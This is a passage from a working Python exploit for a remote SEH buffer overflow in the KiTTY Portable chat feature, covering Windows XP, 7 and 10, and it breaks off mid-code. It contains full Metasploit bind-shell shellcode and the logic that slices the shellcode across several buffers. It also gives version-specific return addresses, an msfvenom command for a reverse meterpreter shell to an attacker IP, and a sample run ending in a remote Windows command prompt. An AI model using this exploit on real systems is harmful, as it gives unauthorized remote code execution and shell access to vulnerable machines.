by system DEP/ASLR/SafeSEH as the main executable is not protected +[+]: works even with small slice size below 50 bytes, instead of 118 +[-]: each buffer sent consumes 100% of one CPU core. Sending many buffers can reach 100% of whole CPU depending on the +CPU's core number. However even on a single core CPU, it is possible to send 9 buffers and run a shellcode successfully. +Also, for a bind shell payload, the connection is kept open even when closing the main program. +[-]: the destination memory address is derived from address of ECX at time of crash. To reuse this slice method on another +vulnerability, it may be required to use another register, or even to use addresses available on stack instead at time of crash. + +Graphical explanation: +--------------------- + +------------------- +------------------- +---- SHELLCODE ---- +------------------- +------------------- + +1) Shellcode Slicer -> slice[1] + -> slice[2] + -> slice[3] + +2) Buffer Builder -> buffer[1]: junk + padding + slice[1] + endmark + shell_copy + nseh + seh + -> buffer[2]: junk + padding + slice[2] + endmark + shell_copy + nseh + seh + -> buffer[3]: junk + padding + slice[3] + endmark + shell_copy + nseh + seh + + TARGET CRASH AREA TARGET DST ADDR + ----------------------- shell_copy -------------- +3) Slice Launcher -> Sends buffer[1] ------------------------>| buffer[1] (thread1) | -----> | slice[1] | <-| + -> Sends buffer[2] ------------------------>| buffer[2] (thread2) | -----> | slice[2] | | + -> Sends buffer[3] ------------------------>| buffer[3] (thread3) | -----> | slice[3] | | + ----------------------- -------------- | + | | + |____________________________________| + jump to rebuilt shellcode + +guillaume@kali64:~$ ./kitty_chat.py 10.0.0.52 win10 + +KiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10) +[*] Connecting to 10.0.0.52 +[*] Sending evil buffer1... (slice 1/3) +[*] Sending evil buffer2... (slice 2/3) +[*] Sending evil buffer3... (slice 3/3) + +[*] Connecting to our shell... +(UNKNOWN) [10.0.0.52] 4444 (?) open +Microsoft Windows [version 10.0.10240] +(c) 2015 Microsoft Corporation. Tous droits reserves. + +C:\kitty\App\KiTTY> + +""" + +import socket, os, time, sys, struct + +print "\nKiTTY Portable <= 0.65.0.2p Chat Remote Buffer Overflow (SEH WinXP/Win7/Win10)" + +if len(sys.argv) < 3: + print "\nUsage: kitty_chat.py [no_nc|local_nc]" + print "Example: kitty_chat.py 192.168.135.130 win7" + print "\n Optional argument:" + print "- 'no_nc' (no netcat), prevents the exploit from starting netcat." + print "Useful if you are using your own shellcode." + print "- 'local_nc (local netcat), binds netcat on local port 4444." + print "Useful if you are using a classic reverse shell shellcode." + sys.exit() + +host = sys.argv[1] # Remote target +win = sys.argv[2] # OS + +# If argument "no_nc" specified, do not start netcat at the end of the exploit +# If argument "local_nc" specified, bind netcat to local port 4444 +# By default netcat will connect to remote host on port 4444 (default shellcode is a bind shell) +netcat = "remote" +if len(sys.argv) == 4: + if sys.argv[3] == "no_nc": + netcat = "disabled" + elif sys.argv[3] == "local_nc": + netcat = "local" + else: + print "Unknown argument: %s" % sys.argv[3] + sys.exit() + +# Destination address, will be used to calculate dst addr copy from ECX + 0x0006EEC6 +relative_jump = 0x112910E8 # = 0x0006EEC6 + 0x11222222 ; avoid NULLs +slice_size = 118 + +# OS buffer alignement +# buffer length written to memory at time of crash +if win == "win7": + offset = 180 +elif win == "win10": + offset = 196 +elif win == "winxp": + offset = 160 + slice_size = 98 # buffer smaller on XP, slice size must be reduced +else: + print "Unknown OS selected: %s" % win + print "Please choose 'winxp', 'win7' or 'win10'" + sys.exit() + +# Shellcode choice: below is a Metasploit bind shell of 350 bytes. However I have tested successfully +# a Metasploit meterpreter reverse RC4 shell of 850 bytes (encoded with x86/alpha_mixed) on Windows XP where the buffer +# is the smallest. The shellcode was cut into 9 slices and worked perfectly :-) The same works of course +# for Windows 7 and Windows 10, where I tested successfully a Metasploit HTTPS reverse shell of 1178 bytes +# (encoded with x86/alpha_mixed), which was cut into 10 slices. To generate such shellcode: +# msfvenom -p windows/meterpreter/reverse_https LHOST=YOUR_ATTACKER_IP LPORT=4444 -e x86/alpha_mixed -b '\x00\x0a\x0d\xff' -f c + +# Metasploit Bind Shell 4444 +# Encoder: x86/fnstenv_mov +# Bad chars: '\x00\x0a\x0d\xff' +# Size: 350 bytes +shellcode = ( +"\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0e\xf9" +"\xa7\x68\x83\xeb\xfc\xe2\xf4\xf2\x11\x25\x68\x0e\xf9\xc7\xe1" +"\xeb\xc8\x67\x0c\x85\xa9\x97\xe3\x5c\xf5\x2c\x3a\x1a\x72\xd5" +"\x40\x01\x4e\xed\x4e\x3f\x06\x0b\x54\x6f\x85\xa5\x44\x2e\x38" +"\x68\x65\x0f\x3e\x45\x9a\x5c\xae\x2c\x3a\x1e\x72\xed\x54\x85" +"\xb5\xb6\x10\xed\xb1\xa6\xb9\x5f\x72\xfe\x48\x0f\x2a\x2c\x21" +"\x16\x1a\x9d\x21\x85\xcd\x2c\x69\xd8\xc8\x58\xc4\xcf\x36\xaa" +"\x69\xc9\xc1\x47\x1d\xf8\xfa\xda\x90\x35\x84\x83\x1d\xea\xa1" +"\x2c\x30\x2a\xf8\x74\x0e\x85\xf5\xec\xe3\x56\xe5\xa6\xbb\x85" +"\xfd\x2c\x69\xde\x70\xe3\x4c\x2a\xa2\xfc\x09\x57\xa3\xf6\x97" +"\xee\xa6\xf8\x32\x85\xeb\x4c\xe5\x53\x91\x94\x5a\x0e\xf9\xcf" +"\x1f\x7d\xcb\xf8\x3c\x66\xb5\xd0\x4e\x09\x06\x72\xd0\x9e\xf8" +"\xa7\x68\x27\x3d\xf3\x38\x66\xd0\x27\x03\x0e\x06\x72\x02\x06" +"\xa0\xf7\x8a\xf3\xb9\xf7\x28\x5e\x91\x4d\x67\xd1\x19\x58\xbd" +"\x99\x91\xa5\x68\x1f\xa5\x2e\x8e\x64\xe9\xf1\x3f\x66\x3b\x7c" +"\x5f\x69\x06\x72\x3f\x66\x4e\x4e\x50\xf1\x06\x72\x3f\x66\x8d" +"\x4b\x53\xef\x06\x72\x3f\x99\x91\xd2\x06\x43\x98\x58\xbd\x66" +"\x9a\xca\x0c\x0e\x70\x44\x3f\x59\xae\x96\x9e\x64\xeb\xfe\x3e" +"\xec\x04\xc1\xaf\x4a\xdd\x9b\x69\x0f\x74\xe3\x4c\x1e\x3f\xa7" +"\x2c\x5a\xa9\xf1\x3e\x58\xbf\xf1\x26\x58\xaf\xf4\x3e\x66\x80" +"\x6b\x57\x88\x06\x72\xe1\xee\xb7\xf1\x2e\xf1\xc9\xcf\x60\x89" +"\xe4\xc7\x97\xdb\x42\x57\xdd\xac\xaf\xcf\xce\x9b\x44\x3a\x97" +"\xdb\xc5\xa1\x14\x04\x79\x5c\x88\x7b\xfc\x1c\x2f\x1d\x8b\xc8" +"\x02\x0e\xaa\x58\xbd" +) +# ############################################################################### +# ** Shellcode Slicer ** +# ############################################################################### +# Slice our shellcode in as many parts as necessary +count = 1 +position = 0 +remaining = len(shellcode) +slice = [] +total_size = 0 + +counter = 0 +while position < len(shellcode): + if remaining > (slice_size - 1): + slice.append(shellcode[position:slice_size*count]) + position = slice_size * count + remaining = len(shellcode) - position + count += 1 + else: # last slice + slice.append(shellcode[position:position+remaining] + '\x90' * (slice_size - remaining)) + position = len(shellcode) + remaining = 0 + + # If shellcode size is less than 256 bytes (\xFF), two slices only are required. However the jump + # to shellcode being on 2 bytes, it would insert a NULL (e.g \xFE\x00). In this case we simply + # add a NOP slice to keep this shellcode slicer generic. + if len(shellcode) < 256: + slice.append('\x90' * slice_size) + total_size += slice_size + + # Keep track of whole slices size, which may be greater than original shellcode size + # if padding is needed for the last slice. Will be used to calculate a jump size later + total_size += len(slice[counter]) + + +# ############################################################################### +# ** Buffer Builder ** +# ############################################################################### +# Prepare as many buffers as we have shellcode slices +seh = '\x36\x31\x4B\x00' # 0x004B3136 / POP POP RET / kitty_portable.exe 0.65.0.2p +#seh = '\x43\x82\x4B\x00' # 0x004B8243 / POP POP RET / kitty_portable.exe 0.63.2.2p +#seh = '\x0B\x34\x49\x00' # 0x0049340B / POP POP RET / kitty_portable.exe 0.62.1.2p +nseh = '\x90' * 4 # will be calculated later +junk = '\x41' * 58 +endmark = '\x43' * 5 # used to mark end of slice +buffer = [] + +for index in range(len(slice)): + # Slice end marker, to stop copy once reached # mov edi,0x4343XXXX + shellcode_end = '\xBF' + slice[index][slice_size-2:slice_size] + '\x43\x43' + + shell_copy = ( # 51 bytes + # Calculate shellcode src & dst address + '\x8B\x5C\x24\x08' # mov ebx,[esp+8] ; retrieve nseh address + ) + + if index < (len(slice) - 1): + # sub bl,0xB2 ; calculate shellcode position from nseh + shell_copy += '\x80\xEB' + struct.pack(" 0: # add esi,0x1117FED7 (+118 * x) + shell_copy += '\x81\xC6' + struct.pack("